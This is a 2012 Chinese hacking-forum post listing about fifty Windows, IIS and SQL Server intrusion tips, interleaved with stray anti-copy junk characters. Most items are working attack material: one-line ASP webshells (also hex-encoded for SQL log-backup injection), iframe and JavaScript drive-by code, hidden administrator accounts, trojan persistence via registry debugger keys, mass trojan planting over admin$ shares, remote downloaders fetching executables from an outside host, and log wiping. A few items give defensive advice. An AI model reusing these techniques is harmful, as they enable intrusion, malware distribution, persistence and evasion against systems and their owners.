找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2264|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下," R( F4 C* _6 O* c
cacls C:\windows\system32 /G hqw20:R6 u% _# \* l  g* r6 n6 P+ y
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入3 _. [  Y* @  y' @
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
5 p8 A$ Y( I$ k3 @+ u2 k5 C2 ]4 ]8 i8 F; ?
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。! t) k8 f! [' z; c9 Z5 s

) d1 z: A! P( D1 ]% s# F3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
9 ]! m9 T# v; t6 Z2 ~0 e& @, ~  r% Q$ T/ t8 }
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号& q; X' a% x7 C3 {5 k! q
, C7 G+ W% B; O- m: q
5、利用INF文件来修改注册表) L7 i7 q. J/ [1 K% H! S
[Version]" j% j  d8 p% Y. ]1 d# _
Signature="$CHICAGO$"
: B  J; r- b/ s* l% c[Defaultinstall]" ]& @0 N- ~  T! g4 V
addREG=Ating: c# r" {1 j1 d; Z
[Ating]9 Z  j2 d( ~# A! u
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"* g4 e* b4 O9 }2 p& e6 a8 G  {, }+ P
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
" l5 p2 z8 I2 P1 Qrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
3 K! a% D) i" _1 F% t' A其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU5 z0 ~5 s/ m6 s8 S8 R" C
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU+ B% J- a$ T! ^0 C* W; B$ a
HKEY_CURRENT_CONFIG 简写为 HKCC
9 S5 g! [8 @5 c4 F0 J' W8 r0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值. X/ C2 i) y0 B1 b( n3 e
"1"这里代表是写入或删除注册表键值中的具体数据
, \6 s0 j" h3 V) D0 B4 p/ {
/ I7 h& e' S  A5 R  S6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
) w" }7 X9 D; V8 {- f2 m9 L  {5 v多了一步就是在防火墙里添加个端口,然后导出其键值) i& C$ `' o/ F4 Z  ~  n
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
$ I0 B' t' k, b$ i, G& a& S% c$ ~8 J* U1 V- V
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
/ M8 N( G! a% d) f. c2 f在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
: k: }+ r2 u, N! \2 Q; U  E3 n" x; W) K/ f3 N; l
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。  p1 o1 O& Y- s1 o
. u3 `, E0 V" v9 q# O9 r
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
$ G  b* e7 f6 K1 W, y- t8 z可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。: {' P. q  [5 O0 K+ C
8 @# L/ T& |1 t, h/ y# F% m
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
+ u0 V8 W7 x: I( r
! w- G+ o& y8 U& y2 Z4 D( _11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
3 K* u& O+ B  h8 L  o9 y用法:xsniff –pass –hide –log pass.txt
3 m/ M( p# r3 @2 a" c
6 T, A7 D* [5 s* d12、google搜索的艺术3 U; V3 ~& j* F0 n0 {
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”! @1 [% Q8 r' o- w
或“字符串的语法错误”可以找到很多sql注入漏洞。
+ c* }% c( u! @2 @
! f# U7 N* z0 K; }, j# V/ Y. d0 ?13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
0 ?8 B; Y8 x# ~9 {0 b# @1 ~: e) }3 O& i5 Y% U
14、cmd中输入 nc –vv –l –p 1987& j$ k! |# _: F* R( T' I$ T
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
$ v4 Y5 t! z  o% @1 D$ ~7 z1 Q( t+ C. ], ]: ]6 V
15、制作T++木马,先写个ating.hta文件,内容为3 v8 i1 k3 k8 {1 r! W3 A$ q7 c# D
<script language="VBScript">+ Y0 ?. O: I3 ?7 \1 u! M' W6 U
set wshshell=createobject ("wscript.shell" ): P# B) }. `2 C. H' \- M
a=wshshell.run("你马的名称",1)
1 }  k0 u! i1 w- iwindow.close
  u/ D9 V6 n' i; w  ?; g$ F: K</script>
6 L' c' _* Q/ d3 h8 B( L再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。/ M; K/ T/ a+ ?! C1 @8 {

6 a8 J: u+ Z1 i+ A5 R16、搜索栏里输入
% b# ^' s, y) Q# m5 I$ e% g8 T2 r; f关键字%'and 1=1 and '%'='
( c) p6 V6 [# x; x! {8 J关键字%'and 1=2 and '%'='
& w- {6 B- C' U. {比较不同处 可以作为注入的特征字符- s5 u; z" Q' N! l& b' q

( z9 N5 q" T6 C9 |% Z17、挂马代码<html>1 i9 G3 z, R. ^5 G% J
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
0 d6 z' D9 S7 Z9 D) |</html>
% }+ q! t& V4 E& M/ f: w" J4 ^2 _( ~  n3 ~
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
% Q8 C- D) e/ M; a5 J% P& Nnet localgroup administrators还是可以看出Guest是管理员来。$ d( Z& F& }! T) J0 p
. T# q# u1 ]4 ^2 |; u* N5 \% o
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
5 r3 t' i  t" h3 y& L4 ?0 n用法: 安装: instsrv.exe 服务名称 路径
0 |' K1 [0 [# O" u' j4 X# i2 d卸载: instsrv.exe 服务名称 REMOVE
: h3 P/ Y) ^- u9 b8 }& j" [0 u
7 O* R9 l8 N8 _5 L  Q0 l& f
3 U: p) A5 {' C) G: m0 y( _21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
6 h, ~3 {; x2 O& o" B不能注入时要第一时间想到%5c暴库。5 @9 x+ k. s; g6 Z7 s) l1 Q

& Q8 A. }' s9 \' _  Z22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~, F, X8 T$ W. H# p4 C& L" Y
7 N9 e( |* O& l$ W" E- t2 h
23、缺少xp_cmdshell时/ w3 }  n' m9 y, U- f  W0 v
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
1 u" {) s$ z% k假如恢复不成功,可以尝试直接加用户(针对开3389的)
1 ^# T- B( p. P5 Vdeclare @o int
" ]& U. `& i! @exec sp_oacreate 'wscript.shell',@o out
0 X) y. p3 q: ^3 Q  }( r9 c+ Qexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员  ^) y9 X3 d( p1 J$ b( D
2 P: R+ _/ w& C6 J5 n1 P
24.批量种植木马.bat& ~) I& g  f: P" h" U
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中8 t+ p: k, b7 H- ^- P/ }( c! P
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
: D+ Y) e5 _3 O' T" z4 ?扫描地址.txt里每个主机名一行 用\\开头
+ J& f) d' I1 B- L3 _0 v4 ]8 w
9 o8 j. L# a: a$ ?3 k4 R& y3 a) x25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。. T+ \5 L% v) L2 p

8 s8 H8 j, C+ k3 r2 r6 K9 L, F& y26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.* `: W+ a; h2 M; V2 x/ Z5 L2 \; k
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
# m; |0 k, s$ X& x% ].cer 等后缀的文件夹下都可以运行任何后缀的asp木马
& z' ]+ s  l+ U
6 y: Q% i. Z2 {7 ~; c1 R. V! Q27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
5 u& N  A: B* L然后用#clear logg和#clear line vty *删除日志* i. h+ U# C3 K# Z6 b& B5 F

% g! C5 _, u; I) K28、电脑坏了省去重新安装系统的方法
1 b/ }8 F  j# j/ `0 h8 H4 c纯dos下执行,
% ~* o; ]" z. _" Q, a/ Xxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
' k4 |: {+ e& f2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
3 i( ?: W! H6 j; D8 A) u  T/ R7 E) C4 \2 b' M! }+ Y3 E
29、解决TCP/IP筛选 在注册表里有三处,分别是:/ x* v! o/ _5 j4 E- _
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
( o" G' g& R  `9 o6 i3 mHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
$ B0 Y9 x( n# o1 N5 iHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip% {- o1 z# E5 K7 K5 U6 o
分别用. h0 ~" a! p' w) L* v2 q8 E
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
" z$ t% ^2 |5 V# T! r% R; {, uregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
/ W+ u! g6 f: ]% @/ \8 R' Jregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
2 b; k& H$ K% f7 }0 g6 y: s7 E命令来导出注册表项
8 G& W1 N( B# @9 m0 u. ^" K然后把三个文件里的EnableSecurityFilters"=dword:00000001,
5 H0 J+ v3 i) p0 r$ B, O* u7 d, r改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
% Q; \5 e8 J. i. q. ]% J) eregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
# B2 y. f$ I3 x/ l0 x
# T! `3 n4 `$ X% Z30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U+ X1 c* Z0 r$ j% Q8 }2 e7 E
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3( d, H0 Q# n% [, A" F  L
+ k' A% G# }* D
31、全手工打造开3389工具# V% j( ~% b7 e8 K& M5 e
打开记事本,编辑内容如下:
0 r% m) U+ ?- x' `* N3 a9 S5 becho [Components] > c:\sql
: N/ ~) g* O# oecho TSEnable = on >> c:\sql) d& |0 K  c, s1 G. S
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
9 H1 b, b& P1 w5 c( i/ o编辑好后存为BAT文件,上传至肉鸡,执行0 v* {/ Y5 E# ~/ V

4 _# ?8 C: k% N4 b& U/ m32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
5 M1 j% v" ^2 S4 B
7 C$ A; u3 |6 H% D( q+ D0 }6 S6 Y4 A33、让服务器重启" S4 D. g8 `- b9 F: A( ~  T
写个bat死循环:
- C/ ?9 H6 K' b@echo off
4 Y% V7 ?! S8 t1 X:loop10 S6 J) T( W) B: X5 Z$ g9 ]
cls
4 g+ o- I- h5 ]: B& |start cmd.exe
  W' s" u' L/ ~5 vgoto loop1
. F& N; a# O5 ]( {1 g保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
" C/ k5 r( r* W) d
# Q1 h3 q$ `6 d# m- c; c' o34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,; q. z) o; O  B1 P1 z- H$ Y' V: Z
@echo off) @. W# P; t6 Z4 C0 K7 z) A
date /t >c:/3389.txt
3 P+ c8 b$ o. ?/ H2 `time /t >>c:/3389.txt
2 J% @. o2 m* `0 M2 a1 cattrib +s +h c:/3389.bat
( |# s6 ]% b* j# a  M& w# P" nattrib +s +h c:/3389.txt
) N3 U$ K- z2 Y/ c# nnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
6 |0 r1 ^( d- c0 z7 z9 E1 y8 W并保存为3389.bat# J( I! u0 e: f
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号' h" I( `) O) h+ [8 Z" Z! J- ?

4 {3 L2 I- O4 B; ?; y' k( z. B35、有时候提不了权限的话,试试这个命令,在命令行里输入:, {" e) w* ^6 T! m0 J
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
/ P, [3 Z4 M& Y" Z" |1 L输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
" j* k- {- U" l  y
, \; h/ h1 q+ Z1 D* q36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
0 X: Y9 Z1 w- Becho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址' M7 X# l9 D" M. i# L1 K2 `) o
echo 你的FTP账号 >>c:\1.bat //输入账号
6 m2 V, {! u2 [- k1 [4 iecho 你的FTP密码 >>c:\1.bat //输入密码
0 ^: e- e6 i3 ^1 h$ Oecho bin >>c:\1.bat //登入
3 |! B9 m* w! {& n6 g: V4 @# zecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
$ T/ H# y) S4 C* necho bye >>c:\1.bat //退出/ D3 b8 f0 v, b2 G! h
然后执行ftp -s:c:\1.bat即可
- ^$ t0 v) Q% ~3 Y2 x2 }
! U7 ^. h5 X/ u4 q! c$ _# n37、修改注册表开3389两法
" K- B1 H+ ^( O$ U2 Z(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
% A( O# q& ^: u! J5 A. U  Lecho Windows Registry Editor Version 5.00 >>3389.reg
$ B( X/ p7 ^0 P$ f- o. lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
/ x- J5 k( I* U. n, xecho "Enabled"="0" >>3389.reg
' r" y4 i+ `# Fecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows7 I" b2 v6 D  c+ G
NT\CurrentVersion\Winlogon] >>3389.reg! M* ?1 t0 n  e& R4 i
echo "ShutdownWithoutLogon"="0" >>3389.reg
, }7 L" I& G* [' Decho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
) D: `" ^  O% }* \, a9 S>>3389.reg
: L/ T: H5 y0 p1 Pecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg! L/ Y" j4 _/ V& x9 t4 q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
; Y+ S4 m) @8 Z2 |1 L0 ^>>3389.reg
5 z/ E  v' a: Pecho "TSEnabled"=dword:00000001 >>3389.reg
' R. h& |/ u& j7 p" O$ Lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
1 n" R' K3 d. }) l; `+ z/ ?$ w! @( eecho "Start"=dword:00000002 >>3389.reg
: E, j. Y$ I1 iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
1 j- {) L  b8 z/ A6 J; ?5 b3 W2 f>>3389.reg
! [1 k: w% @0 r' Wecho "Start"=dword:00000002 >>3389.reg  y: E6 X1 m6 |/ g' r0 `& d" ?
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg* M& u! t! n3 l. _
echo "Hotkey"="1" >>3389.reg
! H0 ?2 D4 I) @+ o4 Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
1 Q# R/ f1 |1 CServer\Wds\rdpwd\Tds\tcp] >>3389.reg
' U1 ?- L9 c* K2 z9 n7 gecho "PortNumber"=dword:00000D3D >>3389.reg1 B% k7 l; d6 A+ g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal+ }* ^( L2 O! ^
Server\WinStations\RDP-Tcp] >>3389.reg
0 ?5 z1 g; T$ o1 G, M7 Decho "PortNumber"=dword:00000D3D >>3389.reg+ @9 p  j) ~/ f/ N
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。6 b. E! c$ p) Z% A! K% p' b
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
; g' V. x4 y! k9 _' d  E0 a3 ?5 Y因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效8 f/ v) d9 T, K: ^$ N$ Z
(2)winxp和win2003终端开启
5 m$ m3 j; w: o8 [% r) _用以下ECHO代码写一个REG文件:
# V0 T0 Q2 @) ?' Vecho Windows Registry Editor Version 5.00>>3389.reg
, c6 {1 h- g5 j# Yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
1 e5 _9 u1 W8 {# y  O% SServer]>>3389.reg
5 w* y, i$ E4 ?3 a& secho "fDenyTSConnections"=dword:00000000>>3389.reg
$ c; k. N  w6 l5 n2 K! O3 Decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
. N5 N( C0 ]# w3 FServer\Wds\rdpwd\Tds\tcp]>>3389.reg
) s% _; k9 e( P4 Qecho "PortNumber"=dword:00000d3d>>3389.reg' b: o) ], |& a! q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; O  V" [; M4 Z5 A: \$ g2 c7 U
Server\WinStations\RDP-Tcp]>>3389.reg8 e  {/ Y* a' ^/ k# R
echo "PortNumber"=dword:00000d3d>>3389.reg3 o4 Z- k) p/ W# h3 ~
然后regedit /s 3389.reg del 3389.reg
5 Y0 [' L# y1 [( t/ _6 dXP下不论开终端还是改终端端口都不需重启
, B: R7 c, z" d6 D- h
2 x, f9 W/ G6 N/ W38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
+ P/ K( ~& k3 b- h0 [: g用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
6 G# `" E; i8 c6 j
7 v5 Z  w4 z& T( ^2 o5 h6 Z39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
8 S5 G8 h8 B, I) f7 b, H5 J3 y(1)数据库文件名应复杂并要有特殊字符
0 P# j! t* D1 F* L( P(2)不要把数据库名称写在conn.asp里,要用ODBC数据源  ~3 L; s( N# F- X
将conn.asp文档中的
+ n3 C+ b2 j* f: A! g8 q- z  t8 lDBPath = Server.MapPath("数据库.mdb")
" E; v+ [9 s2 m& c8 Gconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
, E! y: t. D, s$ U) w% I) J& E, m. ]+ ~/ c% u0 F7 Q' ?
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
. o# \: |$ f3 m. e: F8 Z(3)不放在WEB目录里' h9 D) U) g1 ~

; x# h+ Q" s8 {40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉2 s" O8 H; t, `. @
可以写两个bat文件
- r. x8 C& s  d8 E8 _@echo off2 _$ C- ], P' z
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
5 z& M/ N& \9 @; T9 k@del c:\winnt\system32\query.exe
0 g6 z2 C! f! x! m" }' x3 U1 P@del %SYSTEMROOT%\system32\dllcache\query.exe7 v0 L, i8 I+ R- i. B( k
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的0 \! \$ t# V0 _' {& l' U
4 u3 o" V* r$ m, t6 w$ {
@echo off
& z) h) V2 t( p@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe/ |* L& d5 ]! R3 A/ M  y
@del c:\winnt\system32\tsadmin.exe& ]: O% }+ O6 ^( B* ]0 c( H$ w
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex& l6 |. R: \9 J) j

4 u9 i+ K1 F9 n0 O" J41、映射对方盘符
( D* `, i! P* A( _7 Q& q8 Ftelnet到他的机器上,
1 c1 n8 O' }0 z& M7 g7 mnet share 查看有没有默认共享 如果没有,那么就接着运行- g! I1 G. D! z: |
net share c$=c:
7 F) |' m( f+ ^- x1 knet share现在有c$
7 ^' W+ j/ @% z' V9 M2 c4 _在自己的机器上运行2 a5 y. y3 k$ `; d1 F: i% U
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
8 O* C9 \; D7 \# z6 R9 v  V+ D' [# x' N, p
42、一些很有用的老知识
3 t. w# }8 i& I. X# Y& o1 xtype c:\boot.ini ( 查看系统版本 )% @9 |( h' \! F1 V0 T) M+ m  y
net start (查看已经启动的服务)
4 e( o$ F" N. _; a; L% Rquery user ( 查看当前终端连接 )
) \0 g; A! O( e3 r! r# U; jnet user ( 查看当前用户 )
9 t( \) N% D1 X. Hnet user 用户 密码/add ( 建立账号 )
9 f/ C  w9 ]% v: vnet localgroup administrators 用户 /add (提升某用户为管理员)
1 f; h8 n+ n) ]8 @5 Lipconfig -all ( 查看IP什么的 )1 R- t2 t$ G; [' k
netstat -an ( 查看当前网络状态 )+ P+ ^+ |4 m/ r* L0 n
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)# X& c, n7 x2 k2 {$ o
克隆时Administrator对应1F4' H# v% M( F2 \. E
guest对应1F5
7 T3 ?. K/ P* [+ x3 Itsinternetuser对应3E8
1 ]7 i: c  s" X: G: X7 V+ f' i* u3 P& D$ h4 u
43、如果对方没开3389,但是装了Remote Administrator Service
* J; `* {( A: l  b: G9 Q6 Y用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
( K$ I; X: j6 |5 j, N' a: L解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
' |1 @. }9 {4 W8 f) _8 x) @9 |先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"9 E0 v# a/ K# U

2 o, B4 O2 B3 d7 [44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)  Z' C/ i% l! I  w5 y4 E! [
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)6 D- v# O* l* q4 M- P) H$ P
/ y' E" O' u$ k
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
4 d6 |8 q3 U0 I1 Jecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
, r1 y# J+ s0 k8 Q+ B2 ?7 t% ~4 U^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
# c# q& e$ m9 ~; o. B6 b+ L5 ACreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
9 X- K4 U$ e7 Y" Z1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
$ E/ X  T% D4 n7 |, @, w" C" S(这是完整的一句话,其中没有换行符)
" J% a, O* V0 Q& S4 |然后下载:
4 @- j; P& Z% e5 S: Ccscript down.vbs http://www.hack520.org/hack.exe hack.exe
/ e+ S3 [$ j, g: W+ L
# G/ `* y9 B7 |  F6 U2 s5 B1 }46、一句话木马成功依赖于两个条件:
2 m9 L2 F: J, r1、服务端没有禁止adodb.Stream或FSO组件
. I4 o! c. T1 I& p+ Q& y% s2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。0 l; z. z. a' z! _/ X

9 o$ k" b/ X) J8 x# ~4 V47、利用DB_OWNER权限进行手工备份一句话木马的代码:5 C2 e2 G) f( U/ Y9 T5 b, n
;alter database utsz set RECOVERY FULL--, H7 e& p5 q0 K
;create table cmd (a image)--+ G: K1 d8 m  a9 `4 [$ ^
;backup log utsz to disk = 'D:\cmd' with init--8 j8 `: w9 i1 Z
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--1 A4 u' W! }6 S' a. w4 T9 E
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--$ u$ P/ h1 a% g! r8 M! ^
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。6 v3 D- L2 ~$ W, P

( K6 P" [5 O& H  N48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:% F" T9 _: H0 f+ m& U+ G* T

) t8 v+ {; J! s! B/ N7 ^用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
$ [: b! Q1 v" ?" p; J所有会话用 'all'。9 Z! x% y7 a: k& G3 X, p
-s sessionid 列出会话的信息。
2 b) n/ [, q2 v- q-k sessionid 终止会话。
* h) z& T' }: u% g% E-m sessionid 发送消息到会话。
/ u* {) E9 v5 B* r
! T' S: `" `9 u, Kconfig 配置 telnet 服务器参数。0 c" y2 w% q& g* u) ?2 H1 B' ?; n

1 C9 z4 Y0 U( }/ Y$ Gcommon_options 为:9 W. U1 U0 X% ?: G  ]2 O
-u user 指定要使用其凭据的用户1 V8 j$ P: t2 ]2 Q
-p password 用户密码
' U# l6 J: ]/ @/ X3 n" k
8 T( ]2 s5 U# h8 pconfig_options 为:1 T# P4 {, X" o3 i# Q$ t7 d/ p
dom = domain 设定用户的默认域
' ]) l  \# L# f' u9 J, Pctrlakeymap = yes|no 设定 ALT 键的映射
) N/ P5 F& ^9 U3 z4 [2 D( rtimeout = hh:mm:ss 设定空闲会话超时值( B; l3 ]% e3 H4 m$ B# N( j. u. y
timeoutactive = yes|no 启用空闲会话。8 P/ M$ ~9 W  u" Q! B( H- D3 R" T- E
maxfail = attempts 设定断开前失败的登录企图数。/ F; B3 k: H. X( Y* M+ m
maxconn = connections 设定最大连接数。
$ v& Z' j' r  T& B9 z# Kport = number 设定 telnet 端口。
! o' q% ?- \! N+ fsec = [+/-]NTLM [+/-]passwd. X: ]6 r; O, z
设定身份验证机构& J0 x+ O4 i9 x  q1 x: y  W
fname = file 指定审计文件名。1 m/ ~. B. z( N, p0 X# O
fsize = size 指定审计文件的最大尺寸(MB)。
" ~1 U* Z- c- R4 }9 M) Smode = console|stream 指定操作模式。' m. e3 b5 M, T
auditlocation = eventlog|file|both
5 M+ K+ U: E, y! U) R0 K  w. k指定记录地点, D. n3 b5 h) F/ }# x$ ]
audit = [+/-]user [+/-]fail [+/-]admin
2 N' K! r. ]8 E7 E! z) \
- R+ q  @: c7 C49、例如:在IE上访问:) J8 o5 Z6 w: h8 z9 i
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
7 Y6 o- v4 K) p1 O% C$ M% _- yhack.txt里面的代码是:
  ?$ z( ~! x8 \) p( G<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">5 ~% P- M0 j1 A
把这个hack.txt发到你空间就可以了!8 x9 p4 i. |! C$ l
这个可以利用来做网马哦!
, }- ]% d' y& W3 b/ `  C
9 f' K: S  ^8 R& r7 c) v1 P; q50、autorun的病毒可以通过手动限制!+ e1 i- {' T1 d' \2 H
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
6 J3 N- Q% f3 t* a2,打开盘符用右键打开!切忌双击盘符~$ \0 P# @1 s* u! _- V  _
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
, X( }4 p5 n2 \4 c. g$ U  ]
! R9 ]9 M% W! S4 u( a# _: |( c51、log备份时的一句话木马:/ P: |: ^4 V8 \5 K2 ?
a).<%%25Execute(request("go"))%%25>
+ p9 ]) ]; L+ P2 z& F# Eb).<%Execute(request("go"))%>
9 s( R# v: O% B' Vc).%><%execute request("go")%><%2 O& f( C/ _! S, j  T
d).<script language=VBScript runat=server>execute request("sb")</Script>  j& c$ x, n! g0 v+ a4 x1 a
e).<%25Execute(request("l"))%25>+ t; O3 l. q6 W: d
